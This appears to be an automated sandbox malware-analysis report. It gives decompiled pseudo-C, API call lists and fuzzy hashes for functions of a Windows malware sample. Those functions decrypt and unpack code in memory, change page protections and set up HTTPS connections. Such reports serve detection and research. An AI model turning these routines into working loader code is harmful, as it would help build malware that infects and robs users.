                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2631933831-3251738875
                                                                                                                                  • Opcode ID: a801b8ba59c06fea75d46f237acc1ea87345dec34faa9e4ecdf8df58aaf58cb5
                                                                                                                                  • Instruction ID: 867b6ac9c134480f14353a00f9000e70500a2630d8a14984bbcdda076c236eac
                                                                                                                                  • Opcode Fuzzy Hash: a801b8ba59c06fea75d46f237acc1ea87345dec34faa9e4ecdf8df58aaf58cb5
                                                                                                                                  • Instruction Fuzzy Hash: 3F31E5B6900209EFDB20DFE5CD84EAEB7B8FF48344F10456AF542E7651DA30AE459B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3502E(void* __edx) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				int _v12;
                                                                                                                                  				WCHAR* _v16;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t23;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  				void* _t26;
                                                                                                                                  				intOrPtr _t32;
                                                                                                                                  				intOrPtr _t35;
                                                                                                                                  				intOrPtr _t38;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				void* _t45;
                                                                                                                                  				void* _t50;
                                                                                                                                  				void* _t52;
                                                                                                                                  
                                                                                                                                  				_t50 = __edx;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_t23 = E00A337AC(0,  &_v8); // executed
                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                  					_v8 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t24 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t4 = _t24 + 0xa3edc8; // 0x33a9370
                                                                                                                                  				_t5 = _t24 + 0xa3ed70; // 0x4f0053
                                                                                                                                  				_t26 = E00A34B28( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                  				_t45 = _t26;
                                                                                                                                  				if(_t45 == 0) {
                                                                                                                                  					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                  					_t45 = 8;
                                                                                                                                  					if(_v12 < _t45) {
                                                                                                                                  						_t45 = 1;
                                                                                                                                  						__eflags = 1;
                                                                                                                                  					} else {
                                                                                                                                  						_t32 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  						_t11 = _t32 + 0xa3edbc; // 0x33a9364
                                                                                                                                  						_t48 = _t11;
                                                                                                                                  						_t12 = _t32 + 0xa3ed70; // 0x4f0053
                                                                                                                                  						_t52 = E00A3131E(_t11, _t12, _t11);
                                                                                                                                  						_t59 = _t52;
                                                                                                                                  						if(_t52 != 0) {
                                                                                                                                  							_t35 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  							_t13 = _t35 + 0xa3ee06; // 0x30314549
                                                                                                                                  							if(E00A3117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                                                                                                  								_t61 =  *0xa3d294 - 6;
                                                                                                                                  								if( *0xa3d294 <= 6) {
                                                                                                                                  									_t42 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  									_t15 = _t42 + 0xa3ec12; // 0x52384549
                                                                                                                                  									E00A3117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							_t38 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  							_t17 = _t38 + 0xa3ee00; // 0x33a93a8
                                                                                                                                  							_t18 = _t38 + 0xa3edd8; // 0x680043
                                                                                                                                  							_t45 = E00A35DDA(_v8, 0x80000001, _t52, _t18, _t17);
                                                                                                                                  							HeapFree( *0xa3d270, 0, _t52);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0xa3d270, 0, _v16);
                                                                                                                                  				}
                                                                                                                                  				_t54 = _v8;
                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                  					E00A351BB(_t54);
                                                                                                                                  				}
                                                                                                                                  				return _t45;
                                                                                                                                  			}


















                                                                                                                                  0x00a3512c
                                                                                                                                  0x00a3512c
                                                                                                                                  0x00a3512e
                                                                                                                                  0x00a35133
                                                                                                                                  0x00a35135
                                                                                                                                  0x00a35135
                                                                                                                                  0x00a35140

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033A9370,00000000,?,74E5F710,00000000,74E5F730), ref: 00A3507D
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033A93A8,?,00000000,30314549,00000014,004F0053,033A9364), ref: 00A3511A
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A354EF), ref: 00A3512C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: 1f89f3686314aa152bf5b77bf1307f734f7fde80dc50adea647d419a5aca5f0d
                                                                                                                                  • Instruction ID: b4416f8db7e3ba56ef6a88a5df39afc0a79706e906bb2c6a901b32ec91954ee0
                                                                                                                                  • Opcode Fuzzy Hash: 1f89f3686314aa152bf5b77bf1307f734f7fde80dc50adea647d419a5aca5f0d
                                                                                                                                  • Instruction Fuzzy Hash: 88317172A00508FFEB21EBE8ED85EEA7BBCEB04740F1501A9F500A7161D771AE16DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E6E8D12B5(void* __eax, void* _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				int _t43;
                                                                                                                                  				long _t54;
                                                                                                                                  				signed int _t57;
                                                                                                                                  				void* _t58;
                                                                                                                                  				signed int _t60;
                                                                                                                                  
                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                  				_t57 =  *0x6e8d41c0;
                                                                                                                                  				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                  				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                  				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				if(_v16 <= 0) {
                                                                                                                                  					L12:
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					goto L1;
                                                                                                                                  				}
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t60 = _v12;
                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					asm("bt [esi+0x24], eax");
                                                                                                                                  					if(_t60 >= 0) {
                                                                                                                                  						asm("bt [esi+0x24], eax");
                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                  							L8:
                                                                                                                                  							_t54 = _t57 - 0x69b25f40;
                                                                                                                                  							L9:
                                                                                                                                  							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                  							if(_t43 == 0) {
                                                                                                                                  								_v12 = GetLastError();
                                                                                                                                  							}
                                                                                                                                  							_v8 = _v8 + 1;
                                                                                                                                  							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                                                                                                  							if(_v8 < _v16) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								goto L12;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						asm("bt [esi+0x24], eax");
                                                                                                                                  						_t54 = _t57 - 0x69b25f42;
                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                  							goto L9;
                                                                                                                                  						}
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					asm("bt [esi+0x24], eax");
                                                                                                                                  					if(_t60 >= 0) {
                                                                                                                                  						_t54 = _t57 - 0x69b25f24;
                                                                                                                                  					} else {
                                                                                                                                  						_t54 = _t57 - 0x69b25f04;
                                                                                                                                  					}
                                                                                                                                  					goto L9;
                                                                                                                                  				}
                                                                                                                                  				goto L12;
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E8D12EE
                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E8D1363
                                                                                                                                  • GetLastError.KERNEL32 ref: 6E8D1369
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$ErrorLast
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 1469625949-608512568
                                                                                                                                  • Opcode ID: 679d0cc6c45087c79dfe98508ce3bb3ed8de9601edab933f0e87b641a5592456
                                                                                                                                  • Instruction ID: f8e2bd4ce3a84b0c77390cf2a9b469d99ec897a5749f8932a06cc469cf284d89
                                                                                                                                  • Opcode Fuzzy Hash: 679d0cc6c45087c79dfe98508ce3bb3ed8de9601edab933f0e87b641a5592456
                                                                                                                                  • Instruction Fuzzy Hash: 7B216D7190020ADFDB18CFC5C885AAAF7F4FF08354F41486AE506D7459E7B8AA6CCB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97C338,000008BB), ref: 6E8ED345
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: 1$N
                                                                                                                                  • API String ID: 514040917-3127171972
                                                                                                                                  • Opcode ID: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction ID: 92d9c2a95a581243fc26319c9670bf7367607d88b09f3bb69790878a78ee42e5
                                                                                                                                  • Opcode Fuzzy Hash: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction Fuzzy Hash: B7F260F150C9B08ECF08CF69CA90A797BB2FF97305B14891AD5459A785E3B8D58CDB08
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(80000002), ref: 00A33DFD
                                                                                                                                  • SysAllocString.OLEAUT32(00A328D9), ref: 00A33E41
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A33E55
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A33E63
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E6E8D189E(void* __edi, intOrPtr _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				unsigned int _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				char _v24;
                                                                                                                                  				void* _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				void* _v40;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				signed int _t66;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t83;
                                                                                                                                  				void* _t84;
                                                                                                                                  
                                                                                                                                  				_t83 =  *0x6e8d41b0;
                                                                                                                                  				_t46 = E6E8D2016(_t83,  &_v24,  &_v16);
                                                                                                                                  				_v20 = _t46;
                                                                                                                                  				if(_t46 == 0) {
                                                                                                                                  					asm("sbb ebx, ebx");
                                                                                                                                  					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                                                                                  					_t84 = _t83 + _v24;
                                                                                                                                  					_v40 = _t84;
                                                                                                                                  					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                                                                                                                                  					_v28 = _t53;
                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                  						_v20 = 8;
                                                                                                                                  					} else {
                                                                                                                                  						_v8 = _v8 & 0x00000000;
                                                                                                                                  						if(_t66 <= 0) {
                                                                                                                                  							_t54 =  *0x6e8d41c0;
                                                                                                                                  						} else {
                                                                                                                                  							_t68 = _a4;
                                                                                                                                  							_t57 = _t53 - _t84;
                                                                                                                                  							_t13 = _t68 + 0x6e8d51a7; // 0x6e8d51a7
                                                                                                                                  							_v32 = _t57;
                                                                                                                                  							_v36 = _t57 + _t13;
                                                                                                                                  							_v12 = _t84;
                                                                                                                                  							while(1) {
                                                                                                                                  								asm("movsd");
                                                                                                                                  								asm("movsd");
                                                                                                                                  								asm("movsd");
                                                                                                                                  								E6E8D1AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                                                                                                                                  								_v12 = _v12 + 0x1000;
                                                                                                                                  								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                  								 *0x6e8d41c0 = _t54;
                                                                                                                                  								if(_v8 >= _t66) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t57 = _v32;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t54 != 0x69b25f44) {
                                                                                                                                  							_v20 = 9;
                                                                                                                                  						} else {
                                                                                                                                  							memcpy(_v40, _v28, _v16);
                                                                                                                                  						}
                                                                                                                                  						VirtualFree(_v28, 0, 0x8000); // executed
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v20;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,74E063F0,00003000,00000004,00000030,00000000,74E063F0,00000000,?,?,?,?,?,?,6E8D163B,00000000), ref: 6E8D18F4
                                                                                                                                  • memcpy.NTDLL(?,6E8D163B,74E063F0,?,?,?,?,?,?,6E8D163B,00000000,00000030,74E063F0,00000000), ref: 6E8D198F
                                                                                                                                  • VirtualFree.KERNELBASE(6E8D163B,00000000,00008000,?,?,?,?,?,?,6E8D163B,00000000), ref: 6E8D19AA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$AllocFreememcpy
                                                                                                                                  • String ID: Sep 18 2021
                                                                                                                                  • API String ID: 4010158826-1373364653
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E6E8D1719(void* __ecx, char _a4) {
                                                                                                                                  				long _t3;
                                                                                                                                  				int _t4;
                                                                                                                                  				int _t9;
                                                                                                                                  				void* _t13;
                                                                                                                                  
                                                                                                                                  				_t13 = GetCurrentThread();
                                                                                                                                  				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                  				if(_t3 != 0) {
                                                                                                                                  					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                  				}
                                                                                                                                  				_t4 = E6E8D15C6(_a4); // executed
                                                                                                                                  				_t9 = _t4;
                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                  					SetThreadPriority(_t13, _t4);
                                                                                                                                  				}
                                                                                                                                  				asm("lock xadd [eax], ecx");
                                                                                                                                  				return _t9;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6E8D171C
                                                                                                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E8D1727
                                                                                                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E8D173A
                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E8D174D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452675757-0
                                                                                                                                  • Opcode ID: f595774706689f51e9561da59ef32d54301253a957b702e5bbe31858dcf503cd
                                                                                                                                  • Instruction ID: 1a4a27e08ca20d8762b81d61f372cca8703ff713f1f625a7ec6a21dc8c21cf52
                                                                                                                                  • Opcode Fuzzy Hash: f595774706689f51e9561da59ef32d54301253a957b702e5bbe31858dcf503cd
                                                                                                                                  • Instruction Fuzzy Hash: 78E092313066156BA6122AAD4C88D6F7BACDF923307010635F524D62E4DB548C0EC5A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 23%
                                                                                                                                  			E00A37749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* _t34;
                                                                                                                                  				long _t36;
                                                                                                                                  				unsigned int _t37;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr _t39;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				intOrPtr _t45;
                                                                                                                                  				void* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t63;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				intOrPtr* _t66;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t66 = __esi;
                                                                                                                                  				_t63 = E00A31922(_t34, _a4);
                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                  					L18:
                                                                                                                                  					_t36 = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					_t37 = GetVersion();
                                                                                                                                  					_t69 = _t37 - 6;
                                                                                                                                  					if(_t69 > 0) {
                                                                                                                                  						L5:
                                                                                                                                  						_a4 = 4;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t69 != 0) {
                                                                                                                                  							L4:
                                                                                                                                  							_a4 = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t37 = _t37 >> 8;
                                                                                                                                  							if(_t37 > 2) {
                                                                                                                                  								goto L5;
                                                                                                                                  							} else {
                                                                                                                                  								goto L4;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					__imp__(_t63, _a4, 0, 0, 0); // executed
                                                                                                                                  					 *(_t66 + 0x10) = _t37;
                                                                                                                                  					_t38 = E00A34AAB(_t63);
                                                                                                                                  					if( *(_t66 + 0x10) == 0) {
                                                                                                                                  						goto L18;
                                                                                                                                  					} else {
                                                                                                                                  						_t39 = E00A31922(_t38,  *_t66);
                                                                                                                                  						_v8 = _t39;
                                                                                                                                  						if(_t39 == 0) {
                                                                                                                                  							goto L18;
                                                                                                                                  						} else {
                                                                                                                                  							_t65 = __imp__; // 0x6fa7f5a0
                                                                                                                                  							if(_a8 == 0) {
                                                                                                                                  								L10:
                                                                                                                                  								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                                                                                                                                  								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                                                                                                                                  								_t40 = E00A34AAB(_v8);
                                                                                                                                  								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                                                                                                                                  									goto L18;
                                                                                                                                  								} else {
                                                                                                                                  									_a4 = 0x800100;
                                                                                                                                  									_t56 = E00A31922(_t40,  *((intOrPtr*)(_t66 + 4)));
                                                                                                                                  									if(_t56 == 0) {
                                                                                                                                  										goto L18;
                                                                                                                                  									} else {
                                                                                                                                  										_t42 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  										_t19 = _t42 + 0xa3e758; // 0x450047
                                                                                                                                  										_t43 = _t19;
                                                                                                                                  										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                                                                                                                                  										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                                                                                                                                  										E00A34AAB(_t56);
                                                                                                                                  										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                  										if(_t45 == 0) {
                                                                                                                                  											goto L18;
                                                                                                                                  										} else {
                                                                                                                                  											_t57 = 4;
                                                                                                                                  											_v12 = _t57;
                                                                                                                                  											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                                                                                                                                  											if(_t45 != 0) {
                                                                                                                                  												_a4 = _a4 | 0x00000100;
                                                                                                                                  												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                                                                                                                                  											}
                                                                                                                                  											_push(_t57);
                                                                                                                                  											_push( &_a8);
                                                                                                                                  											_push(6);
                                                                                                                                  											_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                  											if( *_t65() == 0) {
                                                                                                                                  												goto L18;
                                                                                                                                  											} else {
                                                                                                                                  												_push(_t57);
                                                                                                                                  												_push( &_a8);
                                                                                                                                  												_push(5);
                                                                                                                                  												_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                  												if( *_t65() == 0) {
                                                                                                                                  													goto L18;
                                                                                                                                  												} else {
                                                                                                                                  													_t36 = 0;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                  									goto L18;
                                                                                                                                  								} else {
                                                                                                                                  									goto L10;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t36;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                  • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A3544C,00000000,00000000,033A9618,?,?,00A32A8A,?,033A9618,0000EA60), ref: 00A37764
                                                                                                                                  • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A3544C,00000000,00000000,033A9618,?,?,00A32A8A,?,033A9618,0000EA60), ref: 00A3788F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 4097109750-3251738875
                                                                                                                                  • Opcode ID: 47123aa9ef0b1a9eb9424b0bf1e8adcf669da5baba38edfc1ec977187ddc01b0
                                                                                                                                  • Instruction ID: 28503138333d22e6e18afdc4d6ef11e4f79b8471d716c13e4dc782549c0342f4
                                                                                                                                  • Opcode Fuzzy Hash: 47123aa9ef0b1a9eb9424b0bf1e8adcf669da5baba38edfc1ec977187ddc01b0
                                                                                                                                  • Instruction Fuzzy Hash: 0D415FB2504208FFEB359FA4DC89EAE7BBDEF08750F004529F642950A1E771DA85DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                  			E00A35141(char* _a4, char** _a8) {
                                                                                                                                  				char* _t7;
                                                                                                                                  				char* _t11;
                                                                                                                                  				char* _t14;
                                                                                                                                  				char* _t16;
                                                                                                                                  				char* _t17;
                                                                                                                                  				char _t18;
                                                                                                                                  				signed int _t20;
                                                                                                                                  				signed int _t22;
                                                                                                                                  
                                                                                                                                  				_t16 = _a4;
                                                                                                                                  				_push(0x20);
                                                                                                                                  				_t20 = 1;
                                                                                                                                  				_push(_t16);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t7 = StrChrA();
                                                                                                                                  					if(_t7 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t20 = _t20 + 1;
                                                                                                                                  					_push(0x20);
                                                                                                                                  					_push( &(_t7[1]));
                                                                                                                                  				}
                                                                                                                                  				_t11 = E00A375F6(_t20 << 2);
                                                                                                                                  				_a4 = _t11;
                                                                                                                                  				if(_t11 != 0) {
                                                                                                                                  					StrTrimA(_t16, 0xa3c2a4); // executed
                                                                                                                                  					_t22 = 0;
                                                                                                                                  					do {
                                                                                                                                  						_t14 = StrChrA(_t16, 0x20);
                                                                                                                                  						if(_t14 != 0) {
                                                                                                                                  							 *_t14 = 0;
                                                                                                                                  							do {
                                                                                                                                  								_t14 =  &(_t14[1]);
                                                                                                                                  								_t18 =  *_t14;
                                                                                                                                  							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                                  						}
                                                                                                                                  						_t17 = _a4;
                                                                                                                                  						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                                  						_t22 = _t22 + 1;
                                                                                                                                  						_t16 = _t14;
                                                                                                                                  					} while (_t14 != 0);
                                                                                                                                  					 *_a8 = _t17;
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,00000000,033A95AC,00A35390,?,00A3935C,?,033A95AC,?,00A35390), ref: 00A3515D
